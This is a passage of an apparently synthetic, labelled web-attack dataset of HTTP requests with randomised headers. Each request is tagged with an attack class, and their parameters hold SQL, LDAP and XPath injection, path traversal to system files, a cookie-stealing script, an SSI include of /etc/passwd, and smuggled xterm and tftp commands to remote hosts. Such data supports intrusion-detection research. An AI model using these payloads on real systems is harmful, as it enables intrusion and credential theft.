Range: 904036-,02113-35,44499-
Referer: http://ldKh.com/h8ilslj/ee7sma2h.swf
TE: trailers,trailers,gzip
Trailer: Pragma
User-Agent: Mozilla/1.8 (Windows; U; Win98 4.4; ro-ci; rv:0.5.3) Gecko/40791739
UA-CPU: Sparc
UA-Disp: 7509,580,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 697x813
Via: 0.9 www.ehn4el.shtml, 0.3 47.202.161.185, HTTP/0.1 192.73.163.75
Transfer-Encoding: Lktio
Upgrade: Vsr3e/6.8
Warning: 417 136.188.100.128 "xNOs25" "Mon, 28 Aug 06 21:48:58 GMT"
X-Forwarded-For: 203.135.237.55
X-Serial-Number: 055444693738
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43792
Start - Id: 35205
class: SqlInjection
GET /a9jhhs/3dU5_i1akn3et.sh?jea=1726&neiledxoa=feyp%5Deid+snAa+e&null_R-TSeRYhome=dniwr&do=%27%3B+++begin+++++declare+%40ret+varchar%288000%29++set++++%40ret%3D%27%3A%27++++select+++++%40ret%3D%40ret%2B%27++%27%2BEccdN%2B%27%2F%27%2Bpassword++++from++Eeazdg+++where++erRfAtee%3E%40ret++++select+++%40ret+++++as+++ret+into+++++foo+end--&aba=2&4tnlrtew=91338&3X2z6mPKh=group+byhTtsystem%2FiT%5Cmof&3ttPS=94003272&bye4hLfyais=2gplink%3B%5Brvt+xievuseop&3Easha=Fnjnbetween7recRdropccr&on=4dshutdownteo7pie%3B&kdh3luritieskp=n&ehthHeHr=74419541 HTTP/1.1
Host: 148.217.119.178:90581
Connection: hj2a
Accept: application/*;q=0.0, text/html
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: min-fresh=21297
Client-ip: 142.201.79.191
Cookie: te53en5ustma=7
Cookie2: $Version="8"
Date: Fri, 25 Dec 09 13:46:16 GMT
ETag: W/"LM@OO5twrv6vOD3z@"
Expect: 100-continue
From: 1sbtaan@lile.com
If-Modified-Since: Fri, 05 Oct 07 02:49:27 GMT
If-Unmodified-Since: Sun, 15 May 05 21:00:49 CET
If-Match: "mljvsz-0FOdenSPh"
If-None-Match: *
If-Range: Fri, 04 Jan 08 08:25:06 CET
Max-Forwards: 667
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Basic RmVacGU6cmFzQQ==
Authorization: NTLM aHQzaGVudG50NXd1dG10ZXJoc2J6MWlyZWEya2VkeWVudFNqaXRyd2tiZXNz
Range: 786796-,-020
Referer: /orMTetuq.pl
TE: trailers,trailers
Trailer: If-Match
User-Agent: zoior/0.3.1.2
UA-CPU: Sparc
UA-Disp: 601,1500,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0990x1742
Via: AoiaH/8.5 www.jmbewe.htm, radkp/7.2 www.naaMsp.css, 9.8 www.Kiihi.html
Transfer-Encoding: identity
Upgrade: iet/6.8, nt4/7.0, eolcon/0.5, onIars/2.7
Warning: 562 145.202.157.174 "Eninnaeeoatl9O4t" "Mon, 02 Feb 04 01:35:42 GMT"
X-Forwarded-For: 79.157.98.85
X-Serial-Number: 653794992925901
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35205
Start - Id: 38446
class: LdapInjection
GET /l_3RiNE4c3qL8Mtt3X6O/kMchYTvOVi/hakU-0benY/5e4i68o1itio/nMyb0Nfn.v/0ECCLlselect5nidiY4j/SOmz/IxFBJhSin5.gif?rAuWe=%29++%28+%7C+%28displayName%3Dhad*%29++++%28name++%3D++had*++%29%28+++mail%3Dhad*+++%29 HTTP/1.0
Host: www.cEbesu.uk
Connection: close
Accept: audio/*;q=0.8, video/*
Accept-Charset: iso-8859-6
Accept-Encoding: *
Accept-Language: NUri-iRo, c5s3qu-i, oJegf-tzdegsy;q=0.8
Cache-Control: max-age=02
Client-ip: 131.162.142.41
Cookie: c2id=2i1oa
Cookie2: $Version="6"
Date: Tue, 30 Oct 07 22:25:59 CET
ETag: "G3Txigpimi-nkqSesa"
Expect: 100-continue
From: ehrneaE@tHrzlsadoS.fr
If-Modified-Since: Sun, 11 Dec 05 09:46:08 CET
If-Unmodified-Since: Sun, 09 Nov 08 12:17:18 GMT
If-Match: "oG9x.b0lraAL3oXqk46"
If-None-Match: *
If-Range: "bGvh7y0uzwm5qZ8HAJC"
Max-Forwards: 3385
MIME-Version: 3.3
Pragma: ad2AaS4=9pc3ne
Proxy-Authorization: NTLM YXVueWV1dG5kc01uZWVzb3JlaUhrRm5hdGFld2hoc3Ryb250bm44
Authorization: Digest cnonce="ohrEir"
Range: 86309-
Referer: /7eea/s62oj.mspx
TE: gzip
Trailer: If-Range
User-Agent: ompisuwosed5Ti
UA-CPU: 68000
UA-Disp: 945,9874,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 632x125
Via: 5.9 67.169.5.10, rxIe/0.5 www.Rsry.jpg, FTP/8.1 www.itA3T.gif
Transfer-Encoding: identity
Upgrade: tunet/0.9, arant/2.6, wts/9.0, gdp/6.1
Warning: 437 66.2.246.8 "Ubflauttlali" "Tue, 23 Jun 09 09:36:33 GMT"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38446
Start - Id: 42181
class: SqlInjection
GET /hqAp9rMCuiBQaIcU/yewf0etfgsng3/WDEa5s5prms7atum/eiLDz5.jpeg?Vhko_XdJcnc=5x0kubrf&rreh=wheren&irieaey=44&zom2aaaanTo=t3B4N&etii9Ftvatrt=OR+++%274Eiate%27+++IN+%28%27%27++%29&em1yi=ccShZli&exuCo=bshutdownsUnph- HTTP/1.0
Host: www.jknor3.it
Connection: close
Accept: text/*;q=0.0, text/*;q=0.2, audio/basic;q=0.8
Accept-Charset: x-mac-hebrew, us-ascii, x-mac-chinesetrad, isiri-3342, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: AIyho-n, c8-nhterelv, ncusslbs-wla
Cache-Control: max-stale
Client-ip: 171.126.113.10
Cookie: nYxgXoK=guL-jA;neE=89021;m3Achwmbrio=03663;sestt54ti=lrhsit)a1aDswE sa05r;clesbe=oa9shguci
Cookie2: $Version="85"
Date: Sat, 15 Mar 08 21:34:29 GMT
ETag: "VKFBYpcbywJ_iX8q6h."
Expect: 100-continue
From: tnetRvi@fedacee.com
If-Modified-Since: Sun, 22 May 05 22:08:11 UTC
If-Unmodified-Since: Mon, 15 Nov 04 10:49:59 UTC
If-Match: "0x_dSwUbItoUpK7KBMpH"
If-None-Match: "tjFvIU@i0xY0kLmb5TIW"
If-Range: Tue, 28 Jun 05 23:32:10 GMT
Max-Forwards: 049
MIME-Version: 5.3
Pragma: ULst=nh
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: tttnT asArsom=lnlse
Range: 1010-
Referer: http://vgkPe4h4.uk/hacoeeA9/vhsjSn/eowt.png
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Ddnttwb9raaTqsiiweeg
UA-CPU: StrongARM
UA-Disp: 466,6159,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 124x5537
Via: wh3i86/8.6 84.214.31.249, 6.6 152.243.157.211
Transfer-Encoding: compress
Upgrade: iys/4.6, S1i/2.8, sci/5.5
Warning: 077 59.191.158.127 "ei9sntzrrroetttt9" "Sun, 13 May 07 16:46:00 UTC"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42181
Start - Id: 45770
class: PathTransversal
GET /gn6yionffesowwDjo0e/tHzopGNh-E3k/cKHNToIN/slgncueip8Eacet7l/n_zaRfR-Fg-bZUBDjjC.exe?tmecne=%5CWINNT%5Csystem.ini&yo=oonctioe2&efteam=71036824&pewfydeoaaa=ten&AD3etipw=bnrap HTTP/1.1
Host: 35.214.48.88:294
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: b-oiaizsi;q=0.1, s7ie-rstceg2;q=0.4
Cache-Control: min-fresh=142
Client-ip: 229.242.26.88
Cookie: iTiabtrmh=sw3yrD;turh9rincludes;nhssle=hwioalili
Cookie2: $Version="51"
Date: Thu, 18 Jun 09 01:05:03 UTC
ETag: "o-Sve-wo4yNnUq.x7"
Expect: 100-continue
From: 8c67ps@nqoSIe.cz
If-Modified-Since: Mon, 29 Aug 05 14:04:01 UTC
If-Unmodified-Since: Tue, 09 Nov 04 15:10:39 CET
If-Match: "BMsax5dEFmjAEaLy0"
If-None-Match: *
If-Range: *
Max-Forwards: 308
MIME-Version: 2.0
Pragma: wprsju0=dENc
Proxy-Authorization: nE0np rioae=tsisa
Authorization: Basic eWx1ZXRJYTpueW9lZUFl
Range: -500252,934-3694
Referer: /de2p8o6t/Sjved/nehsqa.tar.gz
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/5.3 (Windows; U; WinNT 0.5; 1n-lm; rv:3.8.0) Gecko/04717098
UA-CPU: 68000
UA-Disp: 4288,202,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9810x7556
Via: 5.4 www.bh1bcn.jpeg:39915
Transfer-Encoding: mTkI; eessyt=Hcsigs
Upgrade: pvn3h/3.4, legdk6/8.9, d1wenn/6.0
Warning: 366 www.qjwrkE.jpg:272 "oMcna8llngods" 
X-Forwarded-For: 46.216.57.172
X-Serial-Number: 5959177395
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45770
Start - Id: 36031
class: PathTransversal
GET /e27ywiholim/lIyVtzH5MHsnYe5/chtrbwiina/eJCxG/pnfoeto/rlXUJv/lFcatQTscriptki/oIWzEuLFO/ms@WU0J22i/ogEuh.tiff?lnpc=hs4wTiOp&yp=oUnBkmz&xlreybhaKida=49124&Aobfinnsatf=h9&fr1lyNg=syu7erucn2uq-%40+a&Iref52rezh=osefoee6arcn0diR&se=tpt&hsnymnst=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&nBiplN.Jwt=59884&lobhtgd=eHSqvzmN1wi4 HTTP/1.0
Host: www.bsBe1wdd.net:80
Connection: close
Accept: */*
Accept-Charset: hz-gb-2312;q=0.0
Accept-Encoding: 
Accept-Language: icaM-tAcOb8ti;q=0.7, ncenee-L;q=0.4, eD-aoliunh;q=0.1, 5onu-ttnosrap
Cache-Control: no-transform
Client-ip: 96.60.156.195
Cookie: 62Goer4ibeie=ikrhTrrt-;pht6eu= eenyese;9GGxtermuY=&s0re;os1taaI=rretmdhifrsejgR;cam=ebT0zx
Cookie2: $Version="228"
Date: Sat, 17 Apr 04 18:36:43 UTC
ETag: "1a58EMborIstQSXjUbu@"
Expect: 100-continue
From: hsmda3Ro@7c85h.biz
If-Modified-Since: Fri, 09 Nov 07 22:12:47 UTC
If-Unmodified-Since: Tue, 23 Jan 07 09:41:21 UTC
If-Match: "P965WHfPF_WavaNXnzTe"
If-None-Match: "dH9H.DIJE9oxAbgdUuh"
If-Range: Wed, 27 Jan 10 13:59:46 GMT
Max-Forwards: 8
MIME-Version: 3.0
Pragma: yr=en2n
Proxy-Authorization: Digest response="F3D851Dfd336Af39da99DEaF5dBB2eE4"
Authorization: Basic TDNtSWNpOlFlaHNt
Range: -9,25-34306,2-799
Referer: /ulafon/nrnmi0aa.jsp
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/5.9 (Machintosh; U; PPC Mac OS X 3.4; 4X-nr; rv:8.8.7) Gecko/59608355
UA-Disp: 1024,515,8
UA-OS: Windows 95
UA-Color: color8
Via: 8.0 www.itvkllsa.js, FTP/4.4 89.120.132.143, HTTP/9.5 www.Fdeee.tiff
Transfer-Encoding: oihtt; 4hlW=niuus
Upgrade: r6o/7.3, yasdf/6.0, unlO/6.7
Warning: 147 www.drndra.tiff "Slyqiecbrsiea" "Wed, 18 May 05 16:14:14 UTC"
X-Forwarded-For: 213.226.164.18
X-Serial-Number: 83480
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36031
Start - Id: 49451
class: XPathInjection
GET /1bhoacniPttwateihh.mspx?fYpassthrux_S=tSh%27%5D++++%7C++P++++%7C++%2F%2Fuser%5B+++++name%2Ftext%28++%29+++%3D+%27tbon&Y0f8trseikR3tjb=19576 HTTP/1.1
Host: 250.18.203.84:80
Connection: close
Accept: */*
Accept-Charset: koi8-r;q=0.9, windows-874, euc-jp;q=0.7, x-mac-ce;q=0.9, hz-gb-2312
Accept-Encoding: *;q=0.0
Accept-Language: t6jdadgT-eows4;q=0.9, acuflewy-oehhjtfn;q=0.5, mgat-oIt
Cache-Control: no-store
Client-ip: 111.175.169.32
Cookie: connectRMQdZinputOI6mn=selectafroma =/urestconnectn ruoeval;n.EWG9f=insert l);hbotstohgbesing=t1.8ueswCb@;ouv=iptzC;71g=3504;se8eetnenlisMdn=uesyGhTo
Cookie2: $Version="963"
Date: Fri, 17 Sep 04 21:52:05 UTC
ETag: "XqCHjr..mNlZEMbdy2Og"
Expect: 100-continue
From: n5thibdN@srSdAet.st
If-Modified-Since: Sun, 10 Jan 10 12:48:37 GMT
If-Unmodified-Since: Sat, 24 Mar 07 07:46:20 GMT
If-Match: "GcEp3ypmu@-2ZUfMk"
If-None-Match: "Sb@O847m98Y6FOFIJT8"
If-Range: *
Max-Forwards: 078
MIME-Version: 3.2
Pragma: m='Btoaece'
Proxy-Authorization: htefu trde6=iidO
Authorization: NTLM aG9hb3JuNnR4Z2JjYXRhaHd5ZDA4T2hlcnpxVFR0ZXI2aW5F
Range: -756843,-771,-94
Referer: /doElm/petc.aspx
TE: gzip
Trailer: Accept-Charset
User-Agent: rryae6oweZ
UA-CPU: Sparc
UA-Disp: 247,139,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5758x491
Via: 4.6 www.h82kioE.jpg
Transfer-Encoding: gzip
Upgrade: 7V1i5f/9.3
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 125.87.11.223
X-Serial-Number: 812184590933752195
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49451
Start - Id: 44746
class: PathTransversal
GET /nTapUDi4ALnM_Wcu./vangtsszPeNEeu8eV/fn8tonejnstVwahil/bteoahrsNuZ/annwnE/mJUE4rTNQ3Q9-qh8/3Ow6ftp.OR.nsf?tergce0edhool=4322351&s5sSusxerwtrm=..%2F..%2F..%2Felchre%2Fadmin.txt&o5=g HTTP/1.0
Host: www.k7ugTadrce.uk
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: min-fresh=4587
Client-ip: 239.84.56.120
Cookie: yswjvo=gZgi7;wclYsnyeeyqreo=i1rtn
Cookie2: $Version="5"
Date: Sat, 12 Sep 09 07:40:48 UTC
ETag: "pRYdV20JSOUG4g2by2Bw"
Expect: p5tNvhne
From: rairnenr@fiohetan.org
If-Modified-Since: Fri, 29 Jul 05 22:39:46 UTC
If-Unmodified-Since: Sat, 06 Dec 08 17:25:50 GMT
If-Match: *
If-None-Match: *
If-Range: "isGqpE53p-LmxJdZ-hE_"
Max-Forwards: 448
MIME-Version: 4.7
Pragma: no-cache
Authorization: ihOi 1ueI=the0
Range: 96-3178
Referer: /ttoune/aviCoy/TxesscR/cale8eU.jpg
TE: gzip,trailers,deflate;q=0.6
Trailer: TE
User-Agent: ho1htrl3Nswesesedye
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 7624x8326
Via: Ieukni/7.3 www.Iksh.jpg, FTP/8.6 www.go795Ci.gif, HTTP/7.2 69.246.49.53
Transfer-Encoding: gzip
Upgrade: Qya/6.2
Warning: 004 www.hraiWc.shtml:490 "nb9ae9ph" "Wed, 28 Apr 10 17:57:42 GMT"
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 7113830026427564096
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44746
Start - Id: 47861
class: XSS
GET /rSTWElPMQ5DRA/tZ.asp?m.7qZqUnpZP=0%5Cta&ot=hTlBecjed0tii&avnbsi8EoyBaamj=710&Igkrtt=iempnadtmstste&vTD8rItC@K=bryq1%40K&ieizSc=Ma%3Bnf%29itEt%3Cn&fk8xtaght=iaiotq&uareiz5snP=29&kepashaa=7&rNhw0tsd=%3C%21%5BCDATA%5B%3C%21--%5D%5D++++%3E%3Cscript++%3E%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.tr.com%2Fcgi-bin%2Fneittail.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript+%3E&esoz2tmhIejl=wEelfnu15llce5I5eT HTTP/1.0
Host: www.eGuEga5.biz
Connection: close
Accept: image/*
Accept-Charset: *;q=0.6
Accept-Encoding: deflate, identity;q=0.3, deflate, deflate, deflate;q=0.7
Accept-Language: tel-8yO
Cache-Control: uytldd=a7tcah
Client-ip: 183.238.40.26
Cookie: 3evishneqeoen=1GbcbW_;ar=rgQa;r6IsGpyit1=sc7HPr;n9tehtue2etmeIn=u_5;oenejf=5572018
Cookie2: $Version="7"
Date: Mon, 31 May 04 20:28:49 CET
ETag: "kQpQuL2OtT0Pu4qpGwt5"
Expect: teast5=egohe9Eo;ieasj=rsrnmih
From: 5uawbe5@Rlotbsnho.net
If-Modified-Since: Mon, 13 Oct 08 19:18:02 UTC
If-Unmodified-Since: Wed, 24 Mar 04 17:15:39 UTC
If-Match: "s52Zv4L01-S3.8qO2C2"
If-None-Match: "A@QPoBzJdpQ4VjP.ATJF"
If-Range: *
Max-Forwards: 7574
MIME-Version: 9.4
Pragma: d='iarUmtf'
Proxy-Authorization: Basic Y3Jqbm0wYTpuMm9Zeg==
Authorization: NTLM ZTFnMXNlSTNJZWFpcnZ0dHNGdGFuc1N6b2V0aXJlZW1lMDBhN3NlbW9EaXA=
Range: 595606-7,222673-07
Referer: http://www.w7znso.uk/dEodxAlt/nfoTnoo/aOn58mT.pdf
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.9 (Windows; U; Win 9x 5.6; er-gT; rv:1.0.1) Gecko/83404000
UA-CPU: StrongARM
UA-Disp: 4309,162,32
UA-Pixels: 3411x5439
Via: 2.0 138.209.196.173:24563, sTrb/6.3 www.8xc5U.htm
Transfer-Encoding: compress
Upgrade: eceRm/0.3, e5aiw8/4.3, ahnzt/2.0
Warning: 420 163.148.232.91 "lraIhepmpe4o3l" 
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 110017564718
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47861
Start - Id: 43648
class: OsCommanding
POST /oNJrN_IomCd0CJ5.htm? HTTP/1.1
Content-Length: 133
Content-Language: t,dotnttmu,tTueyide
Content-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Dec 06 23:04:28 CET
Host: www.gtYter.net:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.8
Accept-Language: hstpo-sttm;q=0.0, 6Iv-tyItuRl, eaesui-b3d;q=0.7
Cache-Control: tilt=Neia61r
Client-ip: 81.222.14.189
Cookie: aiotdisto2sen=|     /usr/openwin/bin/xterm+-display+63.170.218.16:0%00;sdd8s=9;ibuhipdpa=mh
Date: Mon, 12 Oct 09 15:09:38 CET
If-Match: "GnOceFAPFVPY-ISX@Q"
If-Range: "nJ3nzIZj4d5c--Y"
Max-Forwards: 8964
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: laiq9a ienDeEe=esrsunb
Referer: /cxsuese.cfm
User-Agent: Mozilla/3.5 (Machintosh; U; PPC 8.5; lf-eu; rv:4.9.0) Gecko/43534179
UA-OS: Windows 95
Transfer-Encoding: zset; TNhEt=ertlcen
Warning: 330 189.29.5.164 "btunD" "Tue, 11 May 04 06:22:52 GMT"

5rwe1daptuo3n=hOttU&_YlocationbA4pYr=wp- &a3pn2bbs1terpec=Enn &8eini07=5612105&esciaoea=7tr&qGi82e7=94544999&1esiattanqnb3=MqWcatgftr

End - Id: 43648
Start - Id: 48828
class: XPathInjection
GET /Ht1nTirdiAiao/o_Y9/iSvRl482Avogg5TNVKah/zk2Vj5cmy-snV/Im0CMG/aydiasizanioort/aIANmduTI.html?gtntresvh=uwem%29&EtX4connect.06a=Nrti%27%5D++++%7C++P++%7C+++%2F%2Fuser%5B++name%2Ftext%28+%29+++%3D+++%27rL4s&stearraej3=5964&oktn=714&aisedelthrEf=nub4llttlofe0teD&2hEg4gtcueuio=e4wA%25bopt&dnaz=shutdownitt&AvitkeeejEe=8025&sB6CT0d=svqconnectol&akcbtp=0dS+r%2Fjdam HTTP/1.1
Host: 119.220.174.70
Connection: close
Accept: */*;q=0.3
Accept-Charset: iso-8859-2;q=0.8, euc-jp;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: e=a
Client-ip: 166.142.219.107
Cookie: rLR7hsAlt=m6anr(
Cookie2: $Version="352"
Date: Thu, 03 Aug 06 12:25:26 GMT
ETag: W/"HxRplA_cWdZdDiPv"
Expect: 100-continue
From: 18kll@eaes.it
If-Modified-Since: Wed, 23 Jun 04 15:46:13 CET
If-Unmodified-Since: Sat, 27 Aug 05 10:03:21 GMT
If-Match: "_6M@gVGFznOp5AxDMQ"
If-None-Match: "LVPxUCcOsqz.AInwqgl"
If-Range: *
Max-Forwards: 8592
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: NTLM bmVpVHByZTAwRm5lZWNvZWIwc2hyU2pzQW5wZmV0cmVzZW9yZWFlZ2FPZXIw
Authorization: mozwE tpuHu=of2keub
Range: 5920-3
Referer: http://nIlo.be/mEsng/htrirSl/ahnT/7dtit.mdb
TE: chunked,trailers
Trailer: Referer
User-Agent: tbgy (dDzWCNBAdy)
UA-CPU: StrongARM
UA-Disp: 8370,749,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0867x2824
Via: 5.8 140.74.219.98, 4.6 www.tsniwcz.shtml
Transfer-Encoding: deflate
Upgrade: qdiue/5.0
Warning: 888 57.174.35.186 "l3aT4eMc1oeMeeesb" 
X-Forwarded-For: 54.250.164.51
X-Serial-Number: 6969445752998
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48828
Start - Id: 39853
class: SSI
PUT /e938Rg/eHc-1vAv/ogainlbiAgg.html? HTTP/1.0
Content-Length: 19
Content-Encoding: deflate
Content-Location: /nmilair.js
Content-MD5: cmNzZTVNb2xkb20yb0xlcw==
Content-Type: application/x-www-form-urlencoded
Host: www.e7fer.gov
Connection: keep-alive
Accept: application/postscript
Accept-Charset: *;q=0.7
Accept-Language: *
Cookie: EnauE=<!--     #include    virtual="/etc/passwd"     -->
Date: Sun, 30 Dec 07 01:19:34 UTC
From: tvfxesoi@dneeTei.fr
Max-Forwards: 1
Pragma: no-cache
Referer: /tiWe/sZGrwyg/osfk/lI4a.nsf
User-Agent: Mozilla/9.3 (compatible; MSIE 1.5; Linux i586; ie6rK; whmEIro; seiwm6cru)
UA-Pixels: 376x9045

tEqsposRnato=node n

End - Id: 39853
Start - Id: 43030
class: OsCommanding
POST /OZllogV2/h9tc/inieHgillpqz2rerttP/seqtooaept/nEstEwhcdaj6zcreiaNP/oo1edg/wOU/ceteqy6aa.mspx? HTTP/1.1
Content-Length: 181
Content-Language: ulsat
Content-Encoding: gzip
Content-Location: /nsittncs/rpbpnmh.aspx
Content-MD5: aHZwY0FzZWVtcjJ1ZXVhNA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Jan 10 10:31:06 CET
Last-Modified: Fri, 06 Jun 08 07:21:36 UTC
Host: 147.46.48.20
Connection: close
Accept: text/plain, audio/*;q=0.4
Accept-Charset: iso-8859-15;q=0.4, iso-8859-5;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.8
Cache-Control: vdhtuUn='HeOe'
Client-ip: 65.119.102.85
Cookie: in4r=7;eeavo=aH
Cookie2: $Version="86"
Date: Wed, 10 Mar 10 09:51:04 CET
ETag: "AlUxBRc1lFh7_IbRVoc"
Expect: 100-continue
From: rnlsu@o9ld8G.org
If-Modified-Since: Thu, 12 Jul 07 08:53:58 UTC
If-Unmodified-Since: Mon, 07 May 07 24:31:59 CET
If-Match: "bBZeu2fqQzAwt@gdDc"
If-None-Match: *
If-Range: Sat, 12 Jan 08 10:38:17 CET
Max-Forwards: 693
Pragma: bpHyiwu=rwt
Proxy-Authorization: NTLM eGV0aXNuc29ydXBqdERwdGVpU25vMHNhbGFvYmJiemFrT2NyYWVoZWhk
Authorization: Digest cnonce="uynuckdc"
Range: -98633,070828-,-9277
Referer: http://ohabcer.it/c9bw/scgb/Rialhld/nioegA9d.png
TE: gzip;q=0.5,deflate
Trailer: Connection
User-Agent: Mozilla/2.3 (X11; U; Linux i586 4.6; ct-Ia; rv:1.6.2) Gecko/76321565
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: FTP/2.4 135.173.84.122
Transfer-Encoding: compress
Upgrade: p2tir/9.7, ante/3.0, yetR/9.1, 99uamy/7.6
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 225.212.15.105
X-Serial-Number: 4857297063808
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

6ocaiy6d=sIoJr&kdoenz5ni6u=h=6m &tfa4=linkENco&3n5ireaouokejdr=eb&xmuNaan8m='    ;uftp  -g     /home/ortolatrgete/tans 47.78.4.112   /icns     ;&psd=eadmin&Z3IvJ=hdr

End - Id: 43030
Start - Id: 37924
class: LdapInjection
GET /eR2J/oewyes67iarOin4ikhNu/mjSUjaGdIczxzcYM_b4E/eooti/1slsPxFqFEqWX3Bz/imgT/tqcn8r-Ax9vUf.shtml?nr7beef=tErtqnFsm-A&lPfnotlA=+t&ranwcsh=5027&4wmnfvnUs=N7oa0Co3ru&9klocationQQ=cf+R4grt0l&d6oeynareseon=Be%25&mnn=e++tsSeHsy%3Faspme&npiHheoqt=%3Fa&input80Jpnx5.wq=129613&fc2K.5G=89878595&njnatp=pt-%40%7Cg%2Fnafm&THY2home=mruSX&ihsoepuR=2823&systemYU8sLFXms=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&DSF6processing-instructionp=%29%5DI4ifN%5Cth%22+2n4a+%22%3C%26 HTTP/1.0
Host: www.ePtewnc.it:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: deflate
Accept-Language: eoCnohtn-El9Y;q=0.5, Sfznl-nppnse
Cache-Control: min-fresh=8
Client-ip: 68.144.9.61
Cookie: tiuaa=g doeteto
Cookie2: $Version="988"
Date: Sun, 27 Nov 05 13:20:02 CET
ETag: W/"soqXkoKH3wNfz3Lwxq"
Expect: dtawu=4tsB
From: ssir@wcooTie.net
If-Modified-Since: Fri, 25 Mar 05 02:21:10 GMT
If-Unmodified-Since: Thu, 12 Feb 09 09:14:55 UTC
If-Match: *
If-None-Match: "GbVs1amUiJ9h-9Hn0"
If-Range: Wed, 24 May 06 20:44:07 UTC
Max-Forwards: 15
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: vLiie9 isIdet=nyae4rtc
Authorization: Basic Y3R0cjpvc3RpbDY=
Range: 55502-651
Referer: http://och3naW.be/oFtaos3n/sardann.js
TE: trailers
Trailer: TE
User-Agent: eEgyh.nSi. http://www.ei6stie.it
UA-CPU: MIPS
UA-Disp: 472,2226,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 649x451
Via: tTeb/3.4 www.lhOntHy.js, FTP/3.6 150.27.48.170, 5.9 www.NahDl.shtml
Transfer-Encoding: Hp0gR; yEri=enneCt
Upgrade: vmr4ce/8.6, ad1h/2.0, 4cr/6.0
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 143.12.94.194
X-Serial-Number: 03021
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37924
Start - Id: 37264
class: LdapInjection
GET /tdp6/jhFad7ctesR/NenNyartistIai/rthrgdal1liA43Zf/ZjZt/wEpFwk0K1UWWTygzcH3/dKJXzgM5q5O.au.sh?eaxaiadnoiaIk3c=3rhzn+%2FL7%40ho%5Ca8+&aMTnk=9bet&eez=vHwFC4&cseerapeitseoo=834105&slquXrnlu9Svtzb=topenrfo%27aee%24iclni&dhosdho4Estsett=775&2haje3lhEa=69&aE=182721090&eiNe3oEmeba7o=xy8sqy4ynt&A2jeoztkiocaFes=homeoE&ieLetwlh=381619117&TRepnchj=cfe&mfurtotsi=%29%28+++%7C+++%28displayName%3Dhad*%29%28name++%3Dhad*++++%29%28+++mail%3Dhad*+%29 HTTP/1.0
Host: 13.28.251.185:632
Connection: eanzacD
Accept: audio/*;q=0.6, audio/x-wav;q=0.6, image/jpeg;q=0.9
Accept-Charset: iso-8859-8, windows-1258, windows-1257
Accept-Encoding: 
Accept-Language: U7-bKsm1aoR;q=0.9, i-nlpn;q=0.6, troehhaT-Ernadmm9;q=0.9, 8ssp8-stwt
Cache-Control: only-if-cached
Client-ip: 5.202.43.68
Cookie: n6tn_meta=iaaim2soairhhw;nt=uwei
Cookie2: $Version="54"
